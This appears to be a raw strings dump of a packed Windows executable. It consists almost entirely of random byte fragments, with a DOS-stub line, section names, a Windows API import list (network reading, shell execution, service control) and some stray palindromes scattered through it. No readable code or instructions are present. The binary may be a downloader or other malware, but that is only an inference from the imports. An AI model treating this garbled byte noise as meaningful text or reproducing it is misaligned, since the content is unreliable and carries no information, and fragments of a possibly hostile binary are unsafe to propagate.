!This program cannot be run in DOS mode.
LSRichZ
.rsrc
.data
.adata
N%NN*
2~F`
9^D!
W%Vj\
q sN
*=cQ
WQ\e<
)7Zce0
;a{h
HxX2
18I8G!
I`V`
a,gb
mKF4`
lJ((:g
d&rh@^
x1_&|q
V%uBH
j SpN
xNTg
N0+J
yy.+
Qo11h
)Q"I
5il\
l*Pj
h6F~
F-O\A
j(l.
SWD<u
YzFQ
4qzJ
uFD5
7RE]
Az$y//0
]mOU>
alula
KElW
Cg"=
B!K`
RJmx
95l~
5GLff
	V-u
UiMy
&\H3L
nKcUj
jc1C
QKhww
Dc2S
<T^Wfs
.a+X
]g+FE<9
XI}8
+)cE'
StB`
*k_qS
[Nb-\
edLu}
r366
wCopg
wFJp
%`Y&
QpsQt
C3>'GA
%)v^
31yS
)	exn
1oT8
Z+T0F
^7GS
eZ|9@j
zT^Pv
/\BS]
5)v^h
K@^Z
o#"e
^366
vE+=
fr87
g!Cp
/'k`
Rl3)
cw- Y=J
-5PA
U &[
R8{>
2G@'$U
2fUkKR7
1Yl]
g	FP
#SBX
n?ad
k(O^
bPHW
\\M+[
qo;!
|'*$
{rtUc\)
'R+&
,y9_
MvdZ
P[K"
9HSe
{E	 
(tR>
\o	xR
eYn/
{2Jk
#a0^
*j^Q
S];i
+N^+
G!UQ
Y3JM
"jef
o8v,
jS@T
0SCz
cIguj
SunmtNP-
z`+2~
E]z3;
T(Xw
d|+[
M!Hq=SdI	
\2@H
U"bX
{Z/P
Y-	_p
;yodR!
MoP>
jm2J
f(tv
??a~
qKnSK
^!^;
3?qv
WRmoB
,]9Vm 
 \$fh{
:Xn3
@wsR
oBiw
n.W1h1
sreU
'U?o
exn2
o3)C
)|0_
pIV6
8q$Yv
Z^tRlj
!ZmFJ
p Uk
`@ q|
-Y*"
Q{D-
\&Q/
%?-S%
vW3C
JtF9V5
 |MYB
Y<BSr}D
AAH	
wtC"
']dYF
i!5x
$R{+
ez2+
21N,W
G$gc
W.#N
9arn
L0%l?
OnNo4
agGN
sCjFH
m(T7 ]
]'P[OBL
4:pr
<]L\
,G\&o
A]upr
-QuO
.C'LZ"o
C?Yu
XBD=
\*^S
3l`g-g
<"N6
W5OE
H]q-
{Wj$y4
TOz{
*2m2P
N'gH
TvM3
t>+OI
L%	=
P_4B
*S#	i
q'*P{
J8^SE
%zMW
p:St
1ZP9
Yd]Ncl
1@q 
"s"p	
[?rx
(W^ch
zr$Ym@
*>+v)%Q
@,$h
D2+@o
*Es~
rTXC@
sreVJ
!#h!
,k;B
q_?:
].;}
<:u]
+%rA
\Y5B
#$<}
VXV>Q
;k5ku
i761
Tx7~
,j`-T
Qr'~
rOcO{c9
0fx'RK
m9$CNw
}qd(|
gmzl
*H"K
7/k=
m81%kli
ZJD$@9
(jl3
~AL9
4DxI
Zam*Hcf
QT3j$,
8Ccf>A
v-{{
?_7*$
:lwG
x!KV
\gq`kiJ
D	F=!
1	?{Gw<
AWeR
E{TW'c
k)VXc
:N5Q5
0T$}
IBwD~%
n$uA
\%YX`}
)Z+u
zRP}
6*aQ	
mn{7
R")$+
Ao$lq
q8SK
ys!i&I
{DYg9
wMpw
 y3l
Q>mp
GBkIfe6b
#U_I
|MK6
Ll%C
EYBw"l
n1vD@
AilE
-m#,.{
:NU[
UD8O
B]<u
P]3g
EuGJ
ZVOm
r"aG
keg`~*
b!yy
._y%
m~%O
LR.s
|='A
K4s7
|q%p
G,v*c4/
X?x6
^Y<Q
vbz$|^
$OW'o
.}@s
UNQ3R$
2(:W
&PtHB
R@N<
}dBgy<
lx&FlCm$
[nA+
,AP3
\1"(
y,BL
2G2*
IC~!
kH[E
dOvB
Ds(d
4kwZ
=f+=
Un5f
[s7c
^3';8
3c19
v(nR{
gIZ|
6vrW
#En)
~6|Ged1
U^%G
4Obz
'bA5
%(dn8
nx<6 
&"2~
3:cu
.xq/
cTB6lu
q|6$
S~s 
lgjr
x>F>
$}]6
BnQ_
st3)
kn$-
[vTa
i@=m
sb@k
[M-I&2
.P$>
ACa:
B26P
B8"qo
94sH
y^{I
Y6TC
KrM?e
^VfvM%
I(%gEg
zdw M
1EZ,
\%B$
T#X;W
D6tkP
zIWX
dxp	
6[9 
A	<F
~}tP
B	P?R
~*`#
|	E/
	LzT
}v:%B
'h\l
ni:6W:T!
r j_C<Nn
< eV
"85j"
#2U	
]N_`
EL2E
5<$_k
bt@4
c*Tj
J+kV
'l2F
j^Js?
xer|
B6yY
T;Xs
9g7&
cNQ/3
aA)1
!tWM
^MVb
7^%M
wf	D
WB)B
NYdp$
6-ur?z4Os
fAn_
1QWV
VW\&
TH\d
pbA|
Ij8M
OW)//
u$5P
xy'Wn
:ACk
wX1-
FFFST
ZFfT
TG&j
B''55H.
~z&+-
)&*$
YxZD
vh"s
/OGU
.	yt
<"TW:
U|[D@
v.7R
'i	9
;uUA
G$F,
g/gl'1
Kh\rX
>P]+
1Z02
)Ug]z
O,.G
8z=y
BGta
P"x	.nj
\u3U
Bome
Tg\qQ
)[00
E  A
\H~f
,dr[
_5+=
x[y;
J3}6
M""o
0L*K
~MNo
!&Nj
fC%X{
X"?[
!(F&S1st
QeB,
fhwc
]Nu1
ESPS
#t53
E3P3
kernel32.dll
D$$%
8MZu
+K +
5tM;#
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
advapi32.dll
shell32.dll
ole32.dll
ws2_32.dll
shlwapi.dll
wininet.dll
version.dll
oleaut32.dll
kernel32.dll
OpenServiceA
ShellExecuteA
CoInitialize
PathRemoveExtensionA
InternetReadFile
GetFileVersionInfoA
VariantChangeTypeEx
RaiseException
W\8P
$Po"0
Strin5
`x"t#
lrh9
LrH9D
3bX$
jZ]_
P*Hd
t2,a
X,J|Y
FcIv
	zd\
u^0:
`GFu
~`=(
$;gR
l~{2
VU4q
M@.^
I5M< 
b0cO
8%_t.
 CG}
dXP*R
t/X)
/h8ce
UhE-
FTWARE\B
orland
RTL8PU
Mas:kV	l
zYF`
R(QS
RG!Y
j&k`
bTjd
R Dw
v)q;w kXJS
;Ofu
]WiN#
K/`*
9:Y"
T>UW
Z+yd
,t\*
`f.F
R`sJ
I	Qq
Huep
GHa,
HVL]*
xv.e
&P_>
orti
yC=p
?ghz
*'dTw
x},Ll
	PSU
?Ec<?\
0-R3f
y5?>A
I,zH
3N&v
K6w~T
XJ NB_	
C AN
"l[Z
}&@C~"
2@y1N
u?1m
M(X1zt
O- m
Bb"{
.N8<
m.oB
A+)8
PbV3
Z	u(
[\UU
@5h3
%W0Q
hQ+S}N
/ 3)
P53\
kern
gon0Pwa:
hN>m
@C H
RSu9	
ofPt
p0IM
{v[;
xF%&u
XHLrD
/&c1
00%Y
f\<v
&[Z]
P/N9
 'ZV
|HtE0
	,U84P
-*we
GogU
BkU'
`~RQC
Pd`#q
,p\()
P0w=
2No}-
sW)+(
8+MF
nGSi
N83$K
	TFileunH
CrchR
 i(: 
	Exc
Degas are we not drawn onward no In union drawn onward to new eras aged
@Uqj;h
EOust
emory:
gldG@p
	<alH
EDti
vByZ
nge2
lowj
LlXHG:
c~i@
AUndHY
PoO6J
0~uV
rEy 
tacLk
"ptAkl
{\!t
FaIod%
{`!0\
HrsV
[NS2P
G0&(
\ua}
\uFW
eF1.;
	t+z
^_Q  :4
[]~$
FA|P	
;D9CB
WP#\
ftpg
PxE 
aJ90
1l!(
@2.@
0, r8
9w7k
&bp"
{ur~
1!H	w
}.yK
UpvM
D`/Y
P$v9bx:
j}w*
T|4	
_rg 
u5Mn
5lsHH
LRpIqWK
4Bu#
'w<~&
5,&|
k~g<
MI Xm
)Kse,
IY}s
%C{\
LB,"X
QvsH
E]_nt
X8 H
q`0V,
$/i_2>
`=%f
>%Ub
s$c!%
w)L|
']d}c
YtX@5
!~N%
QJPj
^Ecr
Gqw^
6`QH
DSbU1<
`d,H
[ca\X^
@UMj)"Hv
G<\@
pi@Iu
 pL,n
D vh
ENc@
m/dR
D@%3I
!Sqx
iskFr
pa~c
2$P$
18&xh?D0
?pT?
l2`|
 RXsK
$*n@
3(')]
WwS'
#qts&X0mr
SD|Va+t
!tAFq1
At	\
1bL_)
?,:H
})?P
,d4R
.7pSKv
%<#Tx
EBjd
<0B;
!|G`
#& C
_tx}:
ABCD
EFGHI
MNOPQR:ST
YZab0sepf
ghijklmn
pqrstuv
yz0123
789+/
= $(
},;:-
)/;z
LXB+0
XOp-
{*/y
9R:u
^PPO
fI<d
QY.V
iu<E
GF,8p@
	+Wb
&Z#o>
HW \	
1;,rp.
@\pag
.syR
\win3
#]a'
$+!@
+8^(\	V
4-PY
a~G/
f&2`Bt=
0{kP
R|Hy
y0	L
%aGO
\L1B
%i 6
/q I
LSID\
b$OP
O9,9_
ARf@L
6UH|B
s&5P1
y6J8
wJY^
wa	>
B`08
}w4>
('F3
[\EM/{j
)hu({
K[G.
$9_`
SN?g
WHrF9e
}K^%
r-C|')9`
^PS!
GH4d
(u\I
_XOR1
pX9nd
LHbz
s; \t
$,j"
JP	H
#E`g
TvD2p
 $iN	
QZ^&
<z`|
*_CA
Xo|J
_(5B
M7/	q
LJo:)0
1KEgB<
qAP9
6<RM
0W{~Kx
($\5
27,$
"<!6W
$BW&
VD4>IB
_VG,
?RTK
([`@4vNX
3pB:
wT{h
<5d@>
#L~F
9J9?.
#8TLG
	g/3
&L"8
\!_p
^xZ'
A50]Pb&
a|Cy
.v2 
N"(dG
$M%V
8~PP
#8Bv
iX5WI
D06 I
h`R|
 RTg
$fJB
8KV,
u@v,
r85u
!S O<
alDr
BC::
LO}@
,+Lt\
`$WI
N\\W
j0Xu
<u0?
YU4~Lp
/1}R
q.OYz
9fdW
^W 4
1@t;
j#>i
SZ"^
T/Y^
egs 
w:Ev
]HyM
V[_&
Ep	z
h0b(
 .tRg
CQ!K
fu1R
gx"J
L&(<0
-	G=
u`JH
38P 
mUOA
x_8>
2n|\
i.0(
T,'.
 `03
|[P$
B8U2
	O>5
gdJh
,C<:
E@3H
@5sT.E
0\X^Is
]/1_=
	D6`
v@kBK
$H}i
2$ S
@8ij!
9Mu+
@~9Hxu
B	+Rq
@.}x
Y"kDx
o;dru
$ECV
528}
+Wj;
mI '
1KS&
OnZ,U
}>YZ
|*G3
W^4Y
 BH<S(
&F>#
p_N\
!(^#
Nd;@
iCZ*
jp`~xe
vsng
JhwW
H}W|
C~?ol
eq`P
God A red nugget A fat egg under a dog
}yi~D
@v1Rq
sKcCoub
hlfQ
@GgQa
ejaic>,
gavc `=wV
m)f}
7v.@
Bvw$c
A'qCa
 tV!
RZc8
T\&f
4cL=
rmUIj
;`.X
qRBp
?x( :X
N)Tv
pG<t
<~RK
I8Y$
!0wQq
PW) H
`#vT
}:-h
\Y-T
9I	j
L$Mq
QDW`
,}Ad
P8.Wj
4,FJ
Xix 
`YZwv
,MzK
cSH2
eL#d
Z8jm;K
C<>'#
?.yXS
4xtU
'3kN
pIt`
}a^v
D,V )
*DQ?
2dxPF
Bp%|:
|<&x}
z%W.
ArSa4
HoQ}LD
E ^C
~Rgq
o$Hf
 *)Y(
j,~B8
Y@-|g
VL^ @
-$WH
PIc"	lD
iS$Uu
i'qHKo
	D*9
^b/?
`5.<b_
jWV(
0qbV
s/W>2
Y3#7A
l% W1
d(W	
/SH;&
6	k<
HcgR
j YF:HB
rfz`
@t]I
~r&/
g(I>
2 &"5	
tqL/
d$pH
<*>GX
LVUB
J;9K
Vt	-
\TV,
vTQI=
E:u5
?=OJN
C+H!
Sx7L
 "U0
NHw4
ijM(
	tT&
,Gen
T-V[
CH%/
($8H
"eDr
9Y=i
WQdN
8?JD
x;}@
7MRw
&+WG
pPE>
RQP6
)O$`=
gFIZ
!]8c
kY"]
t"	%J0
vb+fY
DG_S.
zg4p
^aKu
oS ip
jSu`n
I`[\0
'_~|RuV
, =\B
O6P^
^ZVU
1:3s
)/CL
=@It
(\gP
?l[I
?%[q
A}`l_
EFoun
k~$Q
8vV5
)R >(
 p.QVp
!Y)0
U}w&
/ x!
Beeb
bTn2
RNZ^
zH%$
\ -g
0%'rM
!L<R
|9R_
I?7?
Bk])
-$Gq+
o%u/
'v8U
zHd?`
k';U
|hxu
o	m-
A`]p
4X@hL
@(0.
ut<@`
lk8CNw
E:}I
\n78
rZ p
eaRi
W`TBA
KF\$
wAzLE`
Xv:?
`_p4
nw4	]
,F5D
Z]4d
vqEU
/Em=
*,l"$
LYQw
Gw#q/
!W3_
faRH
rsb+8
A Fv
`q}p
Mu,G
ku6@Fj
k;fpL
f)_	,
)jU0
f?J!
\8t)
"F|n
(b["
#i_Ne
 (08
@P`p
[xr(
 v\}
!GC8
2&p%i
F,0s
6VSjX
Borrow or rob
4$;F
`u(j
WEP/"
.F5:>
CJ0O
GfBk
lTB 
.Zq98
3j@4
]1T,
v$/=p
jT>;y
|.7V
P+r&
 ]~|
cu2|
OSRz
3.%u
vW.@
fa!1
1Kp\
SYpB>
R(/H
v eGh1t
7Z23
8z=Br
b;Xf
bdu	
Xxsy
LANM
(~C,
8TFP
t#,dD
	Work
q\AdX
;ce) 
Edi=
fe?s
;]9%
U\!:
CSDV
{*H\4
tyQ;
sgo$B
RcZ_
yFRP
f,F@
&*PL(
B KA
o`>V
,hJ@
xoq`	
LDp<;
RYhBu
 486DX
ib-B
S0Q^tN
	(Mod'
%U),H
l2|\
a&GX|]*0&s6
JZ	MX
AMDE\
(R) 9o
Chip
nsmevt
br1t
ZWSQfR
VvDs
]"3z
J	pq
X&u<
\-3`
a8d*
Y F0
K["J
T*20)
E	lNy
u7r<2S
$ov~
$>HN
2:.d
]81#P
T{d3
bx<t
CY5$
%	-X
^PB[
'}v<PF
N,T&>
5d(z,
Speci
@(q|
P/Q<R
rd_X
gxdN>G;
E^ h
T?Cg
uMNz>
|Q&P
b10{
p`.<	
W 0)
b(8-`Q
lh:apr
AiuHwW
=Peh
8hvu
K+Pzy
TrP9L
k!J4
XZTR~
>$;x
k.W%
D5GK
&B6m
6:M<
j,?"
`u` no
LO Us>
	S<:
s+R 
x\:o
IL FROv`
/O:8e
 6;0A
DA{T
lain|;
SO-8
XbVO
H,[u|
piR?fl
k|$$
T8x[
2tqR
Wr<"@x
to+"
,iPZ5
6IB`
0]z!
On"Q
fq:r
`Vgd
Z^(4Q
xV<?)
uE-4D
B	D@<m:q
k`S?>
F6-x
pqjl
cef=Ak
x*<L
@>N 
+J	 7
`d8s3
!`C(
cU!K
4J}#
c>C*
NLJ$}
`08:,ut5
gpC;bw
fm(Bhe
 @q;rn
bxg'{}
pv&ub
i|w)
JuSf
H6&S
($1=@
A048
an't
 &j\
"@7G
sE1)G
2A 4
"Zm`
j*WD
i/ :
hPJWte
{R:9
$9_B
e>#f
Z}/K
P<}k
%@|T
;0rm\2
s#y%PS
\OE<
DiyQ,5
w K$?
I$bHB
! ^,N
[zXT
tRO9
>HdT
PC8$
$\Hc
|6E,
'FU>
A`$q<
),uc
L	uPg
n3,#W
	cT|
FBoMu'
;:F5t
FA9U0
pMRW
9$uU
@}Ue
Ht/x
h{k|Y
`>-tx<
Cq*LA
G/%V
.+nWKg
c~:H
{@1<
f=oa
@,C<3
oP@8
S@"b.
bB,V>Kw
*Th	Z
2mL*
CK=u)
A=T*u;
${-T
-b[_s4
vL;*!
4XB$u
<jx@v
8MZ	
	g9I
@(hDZ
h(w9
0L@x
q:;&
O\j 
$HP/
h,vS
p!|U
0v.;
L2<@1 
7Ey>H
KERsN^L
oNs8 R
E>xc
=y#Z
PCSM
|;x:
_[ZJa
0Y&c
:^7u
R8C9
4w,uK[?
v_0 
`%X$
T m%z
XBh)=
m0	'
 7h[
OrE0]
=$VHl
G$Cn
!lLt
TU.u
0	87
PV`2
Runt
ime 
EFqI0
{{P{X{`
hDpx
Ge#j
pQb<#
XZV@
AEIO
b/cd
wxzv
"io2$
FtQX1@
@<DXp
 !$F
8|C`
P1h$
<$BHP
x	QT$
>f1x
Npg0
30Q(
*	X8
YtSA
D(8J
;Z$hHt1
	`Sn
	<$l
J@ZDn
$RHd
^	on
>DJT
gIm'
ypkW
yJ4+
.p_-
8nAS
Gibr'	
ExA:?$L
foHA3
dsrR
16Mo
,od9
E\Of
\HzN
n=gBx
p~i;R
autJ@m
wsQD
bR//d
V#j%
Aq.G
A<.H)V
P@0K
2l\B
7!L\
',G8g<
x'zH|P~r
a!6U
G0g:
\%nO
\I?s$8
G!g`r
'vJxbI
<P;>/>i
<J=fN
IvTx
9GDgL
"!m8~
<"=*
q~sb
J`zZ
X|=`>h?p?x=
[U@|~P
<'@GDgH
@|H~rL
|vTxXz\|`~d~h~x~
tlvpgt
(p91
?r t$v(x8zX|`~d~h~l~p~t~x~|~
0tZD
z4$1
:,;0e
0l:P
rTtXv\e`
\6	L.
tPIT/$\1y
8r%(
.9F'KEW
'>gNl
*0YI
,1rCJ
e	dza
+&2I*
7r&t2
ZLOQ
c'^u
4?AB
$/N?
|rz\
l.yt9
3#6<D$
;#XbvB
'7i82
=9<q:
097H:
I>n0u
'T@t
$1[k
v6xWzw
lj\&
	6Ga
48lN
YHhu>
GPgb
dI^b.,
9>F:J
Y?]La
4r|t
#@`xBzO
1rEt
@z\Ddl
-;r'
K{@.
h0-?
?'CGGgK
%'-G=g
N0"3
JFAD
|W~^Kd
0qZG
[8L/s
tX8/
<F->eA
{|~?
Tacocat
xRI\
u'zG
fGqd{
w,|?
bpx[
:";)
]oZ.
p|K:
@(jl`Rrr1
3rHK
rStY
(0=,
01aDY0
taOi
7O(G
~`^i
x(tc`
*xh<
93R:
:M%`
@(*<K=W
>c'jA
bY6Z;
9:%$-b
8>T\w
6"AX
r|x&
xP_T
4q0*
~Q$S
DW(}
h&Tu:Ea*
V#vQ
rjL~h
PQVx
^YXb
3G`z
g[uSo
eRP=
avuu
%$B{
_&j0
/Au<
[#>t|
%7y*
3r \
)sZl
printf
pA>du
FXA'Lo
:~l"uFyZ
Tzrfwa%cn
9*uLf
!F0#
 Osk
TNZ$8;
iJYH
Q&!+
+ps`
Ym/R*
=h+a"
2o _
DKRJ
yF5Q
VLu.
s-;aJ
'h[x
zXEJY8y
zI~F
hb/+
SDa=NqR
aQ2g
DYy.ni
I?.od
{sbk9 
^(y 
[n{H
HDzh
pr~R
6EU(
U%5V4
N	f9
rg-Nsd&
y<* /
<ZkI:
%AfM
OJm@
(];v
W1/MM
vFC+=
^?7&
6j<T8
RWN<
O!srz0L
Q/B	
M'/z
~e4zX
B>W{
~)WV:
2?NO
B\s|
[_O6
"'1P
C=(^P
QQ l
euj{|
27ZB
'a_;D&y
\0smK>YL4s
ar#xG
K`l	
^#|z
YSeBu
JX6y
c<i&*
q.w	
zP_G{
Y$FE]b
b<x5
[M9<
o|EE
pz}.
RJg!
.%(Fh
Do nine men interpret Nine men I nod
oOW[
cGG=
B`'6e_c
ShZi<
L7x	.
 E'S
{-9!o!
l=ZR:h
&^CQ
lb~!
ku^"p 
DMiNZ
j-?N
g/TJ
rt&_
v^Tr
U5hHTv
b((H
g^%1
WJg4
U}+mr
\7aRF
8eAp
aQ~4
PU{G?
SI)C
&}a$
63O<j:C
 *iS
0bEw
rs?o
1	=NY
U[(b
&440U
63uD
Mtg4X
7YAI
ezr,
!']Ck
?m4&>
0hO*^
\&Ni
z)E^
J\z"\I
{(-1J
w_K/m
9CB+
xK!v
%1Es
v-+J
eQ5q
qs<p
7	S@
fzfF<
l1:P
VM"'t
JKQF
!G'Yd
p[KH
p!	 
wZTd
ClNC
a,	w
=m*~*v
Oa-O
I7q}
s]^N
J80J
*Y+d
{EoHu?
30rMI
bk5(
w<B}+ 
(%uwM
n}@p
h1,"h
pRhg%
{lG6
~AKbC
mX` 7
O<&uFx
fbR}w
<,l>
Yp;>
w$Q:
IY5&(
!hI,x\
~:~"M
cBvB
Oi)w
Fm(/i
%&l=|
S/^ICL
ND9x?
Eleele
/AQ#
R&Y|
p4*J
;C9A
y,OE
WIEc
:O3[Y
RY{l
TrYM
)cm'
QA8K
2Z(0
9R|.
;ZFmi
!RA,D
P\>Pz|U
O=s1B
&M-"
aB}N
_|m-
e5m'
-#2U
l#bh&
mb=x
bvg~c
3b<K
yBm"
-daQB
{*KG
J|~h
QjX0
0D(_P
EA8}
*tu0
~;$wm
Wpmq_
6(^=o0>T
e(,E
5@Q@k
vh;2
D)Aq
Pz08;
uOMw
[h&A
f&9D
2Ih-
AT_%
ex|U
>0km
|p%s
DiO$,,
	8Vphs
D.#&
NYIk
p%rZ
u4*(
FJR6
;4C(
%"Zp
v%Z[tu
_:QI=V;
XPrb
}CBpE
A Santa lives evil at NASA
lIu[
B$LO
Kzas
< I*&
o|?}
s~zC
^No>
HOA	
*1ME!
)EdPS
e&HY
QO/{
6RQlr
YiyJnO
c6Ny
x{2wus
IY #
sS*\{
K>G'
FF9C
BcWW
8qAu
8(<'t
*aP*
W'n6
7M[|[
}]Zw
X,v4
0)!;
rrz!=<
)Omj|
C:3>
ZlXI
/|{X
T`mSc
@DE8
l:j^
Qg^B
1^Y^
BP*Rm
~/gY
hvdJl
+4g5
pDccp
jClB
R32Z
+'I+
E,*U6 
"t~e
"M-H
<*~B
`9Qo" 
qB"u
DHG<z 
0^cyJ
6S+(
yo#`
]1Ux>
D&4Al
EDXr
4.Cs
O7kh
rzPQ
pqM/
}*PNv
#+1Y
GD	-
{@;*g
.pc0
((~l
q{e6Vw
NTD*
qm=	
CMtp
[sKU~.
te]>
rY;'
\^j#6
6wVF
l?8Ab}
?"+mD&
J_ju
	Har?
PVXt
 pE#<J
c=G9r
J/Qe
+b6F
3#}DH:
P|W[
Nh#7'
=		@-X6
a]1w
T..8
8L9w'5
<^;k
I&Li
E4Kf.
??!d
=)/#
/wQ`
$X5`
Iw]N
0!7u
^Wn<
+r;6
A+u<
-_KFm
Jrklw
s0K2
U&Q%
/p);%
77jw
Pm(J
\DOa
Fe$Qk
raGR
rmD7
2hGj{
97tF
3G]zv_
If{#BL
FM?i
08:q
ow82e
w(_->
R*$8
7JSOqq
[#|)
6SGx
j.n^
&aBv
q?~X>
@lH=U
H*%fT
f|"@P
9l[*w
<Xgj
=T2-N
Nb8	q
||,l
u{6@6
Mg*@
V$<6
hpbS0PWq
jNg,
?kU^
f#nNI2
vJ~>
R:j;
1X;d[D!q
-`RT
,&5u
qekW
E&]m 
k5g.
]'p5xNH
t*E{
k& 4
>yVvk
T]:x
TiwvL
%If~
uCZ)r9'
TOj:y:J
`~	V"
6:yn
E>kt
Pj^>w
i[^cV
"Lq+d
.evu
*Em.!:
>@On
m4Gnr^
Chmq
zRtV
mn"*v
 )0p
~ez|
/oVV
ewvi
E={9
D!*p
'Au8
+ yY,o
t]s;n
X!~*
3NPxf
(t>.
uO1\T/
+C_	
^*GY
pXrT~
R!|+
m#"tV+
aE_F
"lG2{
xXwO
^Ty]
mL	=
!)Z7
dX,B
}9*l
+.E&:
R,7GhQK
n{5a
*W~o
mW;u
i3M=.<
1\*aDE
2c-/;
oSmCk8:E
wO8--
$dOj
+H$A
jF#.
^vPL
0:,'
"~/)uw
zsswI
&C,/
OS:	D{s
Z2;+
FIas
y\(dd
%U'b
?'Hi
Zfvs)
ouj~
u^ ){
c_>*
$hv@Q1
nwg?
/%q]
}y9:Y
I:|0
OJng
eF8UY
_,R/
Z9{RX;-
.*{n
};B7
YRl%
CIR|z~
t~92<:7M
AGF)
n`o-7be
4r*t
nD||
4W3J
2QC&
BOW&
@eR{
&L%%
l(+o
1("j
Osey)a8
CVTu
H	pr
W-mY
JI[fuN1
qsA.g
=#wj+n
btwg
<8SRP#
3*c=
h3MHk
sGg[
k\$?
W(&J
-;F|q
"!lj@
A$;EH
y^gR
qceH
j:+c=
Kf$0
|>6u/
lN&|
fG.08
HmD/
yfV+0
lbTJv
4u,S
V	jJ
6iNH
3Ptq
N$f!
Sm+U
Zv2+
``9P
IdPXr
.G@g
Jf`7
E=*]
5n(\
h$gnl
I>kao
\+\v
Diy#b
YFT)
*c9!
v!G~B0
aiT\
ITR 
$36r
|bl0w
R6P<]w
A(p&J
fQWd
ud1U
7	8#
< xo
-!n/
q{	V
 /1#
r-~	
>}gR
%)2e
A[H9
Q<)lT1?
zN<-
V5X1
q%U	
%9`D
&9A?6
4Q>o/
 \]I
 RfEx6Y
T%MA
<!R$
Nz4y
>$h^[b`
RoNo
xLqG
<Q9h
H*x7
@ny%lV
FuF]
k&L5
LleNu
+yi	
gt8LZ
.}\k
ss"d
[^eOr~
AP.W
c`9i>Fa
}@EX
Q&-J 
sT8F0
:oCiWD
?`sW
2lt;
I`;:
aqAEA
F@C1-
Cz{q
+%qE
ZH=9
|tAM
8{URC
]BC$O<
Rnrl
 '.m
i!>'
*0BX
LAn;
\^S3
yz^k
=973
{<3ne
F$j-b
\?-I
/]JD=
>C$p
B5!W&
(oBn
zPG?t.]
<bGx
t0^#
/#M4
O/#.
(OKQ
sOS7
ZM)C
%.tw
uQ5C
}<+q
Ax'f
yA|Y
HHA)
UHn{D
Vv.F
|rS4
i%"N
@OEUS"a
]%ts
@~m$v5
uYGB
z_SC
D8~t=%
#?/{
0gVPz
}Q(\u
5Pni
kGpA
jUSb
'S#\
h:/O
[\1z
wp3h)
@t`V
o]GY
s!^)
FEpHa
)A\hR
l)^Z
n%CWi
,l*o
Amip
lJ'*AIHjgg
n&|7
18a4Q
Sw%"9
4r6J
Q3#_
,o[BY
y<_zk
]Li&2
%	ra
 --A
8cu:
Gm^f
:*NX
))-F
PvRQ
K7Ej
bKqc
q?CW
|r$t
t+X&
g*(\
	SRaw
VoaXH
Ic)^
?>g,
^P<%5
h2z8
*pDB
TjA<5
Q[!k
`W8,
Q<F8fu
`oH|
$wiq
 bBZ=
"UHm
'm)&
G[Cr
}9]v]+
k4Xu
6cgc
WA]Y
j3c&
l@Im
Xw3l
du:?
cx@`
A}jw
>1AD3
`58+X+
ky'O-
29mr
{*Y,
z7X`
0:}S
s-i]
)M]-
>>uj
afj==
>:Bjz$
NDE=
iTSrxua
yk-r
I0(c
"aE==
H9*|[
|+^0
%[z*
.&52'@
Y(W>-
g&h?[
"G:}
WO:G
?<}O
_QNu
s9g=
@vN{
Y_hW
F{+v
k"Jly~
[6teU
Httr
yOq@
l^z>
\s	R
l+42
"1&!t
{6?f
E'*;
!93n&
IasE
t >Y
t<f+$
G|=a(]R
vVu*
(,Q	a
nTlEh
<f[2
K'z#x^M
2b|8xB
Ldth#
2m|I
QKCiwe
l,2VHw
m!@Ww
NtxJ+
i745H`
M`1xP
[q8(
iEF{
a|1%
bH&J
n\hF
R*=8SJ
4+BY
CGX}
U>e:
cmlF!
Fq5h
p+eSz
~ZiI
q<+7
+.QI
R;2ig
BTsd
#04)r
<%>O
]a3%!~
M2-xml
R&Vg>
YAl]R
CSp+
$b_`
&P M
}>jH
p)sU>
M<$P
D,l\
y{?]
r/We`-
~g36
%o:,
ymO:
k=s,
(3|#
nro[
sW}_?o
Y+g4
SaT,H
-ZCA
U+pc
GR16
	_\N
]f?H"
0g0M
93)z
.{Q68
7*z-
D%x)
WVUa%
avt9
